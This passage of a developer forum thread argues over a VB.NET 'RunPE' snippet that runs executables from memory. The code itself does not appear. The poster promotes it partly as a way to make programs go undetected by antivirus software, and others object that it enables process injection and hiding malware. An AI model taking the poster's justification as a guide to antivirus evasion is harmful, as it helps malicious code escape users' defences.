    And yes, it does prevent touching the hard disk! Why is that still unclear to you?
    To your question, why not run it from CD then... There are still some CD drives which can only read but not write, and imagine now on such a PC, hmm, let me think, we want to recover some deleted files!

    The program we wrote for recovering files has internally another program (a special algorithm application which calculates some results for us, and we use these results for recovering files... (and imagine, we don't have the sources of this file, so we can't integrate this algorithm in a normal way in our project, and imagine again, this winPE is allowed to be used in projects without any licence problems or whatever...)). You could now say, why not two files on the CD from the beginning on... well, isn't it better, and more portable, in only one EXE? Is the example now OK?

    But as I said, this method can be used to make applications just more undetected by antivirus software, so if you have an application which is detected by AVs just because you import some Win-API methods/DLLs, you could want to avoid those false positives. Now you could again say, why don't you just add your EXE to the whitelist of AVs... well, I share my tools and help many friends with my tools, and it annoys them too how their AV works. Now nothing was criminal here, and it's just another example.

    Well, another big benefit of this method is that everything happens in RAM, much! faster... ehm... OK, enough examples... You should have already understood that this method gives a coder just more flexibility while developing in Windows environments...

    Please don't let me question your creativity next time.

  16. #16
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    Yeah, to be honest I'm surprised this thread hasn't been removed...


  17. #17
    Stack Overflow moderator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    Um, running from memory won't stop the program from reading/writing files (how do you think Knoppix works?) and when running an EXE from CD, you can use a MemoryStream to save files. Don't let me question your creativity next time.

  18. #18
    PowerPoster JuggaloBrotha's Avatar
    Join Date
    Sep 2005
    Location
    Lansing, MI; USA
    Posts
    4,286

    Re: [VB.NET] RunPE

    Quote Originally Posted by Aksak
    This code does run under Windows Vista and 7, 32-bit as well as 64-bit too (as far as I know on all Windows NTs, so it would work in Win98).
    Just to clarify something for you: Win95, Win98, Win98SE and WinME are not NT based.

    However: WinNT, WinNT2, WinNT3, WinNT4, Win2k, WinXP, Server 2003, Vista, Server 2008, Win7, Server 2008 RC2 are all NT based.
    Quote Originally Posted by chris128
    Yeah, to be honest I'm surprised this thread hasn't been removed...
    Me too...
    Currently using VS 2015 Enterprise on Win10 Enterprise x64.

    CodeBank: All Threads • Colors ComboBox • Fading & Gradient Form • MoveItemListBox/MoveItemListView • MultilineListBox • MenuButton • ToolStripCheckBox • Start with Windows

  19. #19
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by minitech
    Um, running from memory won't stop the program from reading/writing files (how do you think Knoppix works?) and when running an EXE from CD, you can use a MemoryStream to save files. Don't let me question your creativity next time.
    Ehm, what do you mean by that? It is really not logical what you say: "running from memory won't stop the program from reading/writing files"??? Running from memory DOES stop a program from reading/writing files!

    @ "and when running an EXE from CD, you can use a MemoryStream to save files."
    And why would I want to save files??? What are you talking about?

    @ "how do you think Knoppix works?"
    I think it uses a virtual RAM device, but if it doesn't, it doesn't matter, because that isn't the topic now, how Knoppix works.

    @chris128 and JuggaloBrotha
    Why remove the thread?? It's useful source!

    @JuggaloBrotha
    Sure, I know that, I wanted to write "wouldn't", therefore I explicitly mention Win98... I did in fact edit this already but the forum didn't update it, whyever..

  20. #20
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    I know precisely why it hasn't been closed... needless to say, it's something out of the hands of us mere mortals.

    Aksak - just because an app loads all of its DLLs into memory does not mean that the app won't or can't write to the HD... it still very much can. It just doesn't HAVE to, to get to the loaded resources.

    Additionally, YOU may find the code useful, but a lot of us find it offensive, objectionable, and unethical. It can be used to load a DLL into memory and INJECT IT into another process. And I don't mean my own process, but the process of another app... giving me the ability to hijack it. THAT is what the posters here are objecting to. We've spent a LOT of years keeping nefarious code and discussions out of here. This isn't a hackers' forum, this is a professional developers' forum. Armed with the AUP, we've done a pretty good job at self-policing these kinds of threads and stopping them before they take off and do harm (which has been known to happen... those who have been here long enough will remember the snake incident - which is why no one will just download things from here anymore, at least not without being able to look at the source code).

    "this method can be used to make applications just more undetected by antivirus softwares" And THAT right there is reason enough (for me at any rate) to be very very very nervous. Doesn't matter if an app triggers a false positive... it's going to allow someone to run code, hidden from me... and my system. I don't like that. And neither should you. It can be used to intentionally hide malicious code from the AV that's supposed to be protecting you.

    Yes, I understand that I used "can" and "could" a lot. And yes, there is a lot of code on this site that is freely available already that could be used badly... like writing to a file... someone could easily take some simple code and just start writing a stream to the HD until it fills and potentially crashes the system. The difference is that there isn't anything inherently wrong with writing to a file. It's something most (if not all) of us do almost daily. It's a common practice. DLL injection, on the other hand, is NOT a common process, and is generally NOT a useful thing to do. Most people who are looking to do injections have a less than respectable intent. They are looking to either do harm to the system, the application, or to modify the way something is working. It's a hacker's tool. There was a time when we didn't tolerate that around here. Unfortunately times are changing.

    -tg
    * I don't respond to private (PM) requests for help. It's not conducive to the general learning of others.*
    * I also don't respond to friend requests. Save a few bits and don't bother. I'll just end up rejecting anyways.*
    * How to get EFFECTIVE help: The Hitchhiker's Guide to Getting Help at VBF - Removing eels from your hovercraft *
    * How to Use Parameters * Create Disconnected ADO Recordset Clones * Set your VB6 ActiveX Compatibility * Get rid of those pesky VB Line Numbers * I swear I saved my data, where'd it run off to??? *

  21. #21
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    In my definition, a developers' forum on which "non-common" code isn't respected isn't a professional developers' forum. Uncommon code snippets give coders new perspectives and opportunities. As you said yourself, all knowledge can be used for bad purposes. But well, you are right, this code here is more dangerous than others. Therefore I would call this forum rather a censoring forum, and I'm against this type of censorship (when knowledge itself doesn't harm one more than it helps one, but it CAN be used harmfully, even if it can be used 99% of the time only for harmful things and 1% for good things, because this is the decision problem of the one who uses this information, and not ours.)

    But I still understand that you want to censor this information with the best intentions..

  22. #22
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    Well, fortunately for you, the powers that be agree. Doesn't mean I have to. It also means I have the right to walk away and not be a party to this.

    So long, farewell, and thanks for the fish.

    -tg

  23. #23
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    I want my fish back

    PS I love that one of the variables in this code is labelled "sVictim" - not for anything malicious you say?...
    Last edited by chris128; Jun 9th, 2010 at 05:28 PM.
    My free .NET Windows API library (Version 2.2 Released 12/06/2011)

    Blog: cjwdev.wordpress.com
    Web: www.cjwdev.co.uk


  24. #24
    Stack Overflow moderator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    Ehm, what do you mean by that? It is really not logical what you say: "running from memory won't stop the program from reading/writing files"??? Running from memory DOES stop a program from reading/writing files!

    @ "and when running an EXE from CD, you can use a MemoryStream to save files."
    And why would I want to save files??? What are you talking about?

    @ "how do you think Knoppix works?"
    I think it uses a virtual RAM device, but if it doesn't, it doesn't matter, because how Knoppix works isn't the topic now.
    By that I mean that "you can still read and write to the hard drive, no matter where you're running from". Knoppix can access your hard drive, and it still runs entirely from memory - I wonder how that works? (sarcasm, BTW)

    @ "and when running an EXE from CD, you can use a MemoryStream to save files."
    And why would I want to save files??? What are you talking about?
    And yes, it DOES prevent it from touching the hard disk! Why is that still unclear to you?
    To your question, why not run it from CD then... There are still some CD drives which can only read but not write, and imagine now on such a PC, hmm, let me think, we want to recover some deleted files!
    I think you just answered your own question there.

  25. #25
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by minitech View Post
    By that I mean that "you can still read and write to the hard drive, no matter where you're running from". Knoppix can access your hard drive, and it still runs entirely from memory - I wonder how that works? (sarcasm, BTW)

    I think you just answered your own question there.
    I still don't understand you, really. What I'm "trying to do" in my example is to avoid writing to the hard drive. SURE I CAN read and write, but I don't HAVE TO write to the hard disk with this method for executing an exe. So why do you tell me that I can interact with the hard disk?? I never said the opposite!?

    Also, Knoppix doesn't need to access the hard disk once it runs, and I also never said that Knoppix or any program can't access the hard disk. What are you talking about? (no sarcasm, btw)

  26. #26
    Stack Overflow moderator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    ... wow. What I'm saying is that running from CD is pretty much exactly the same. Except you can't take out the CD.

  27. #27
    Lively Member
    Join Date
    Jan 2010
    Posts
    124

    Re: [VB.NET] RunPE

    Has anyone here successfully made this code work for Vista and/or Windows 7?
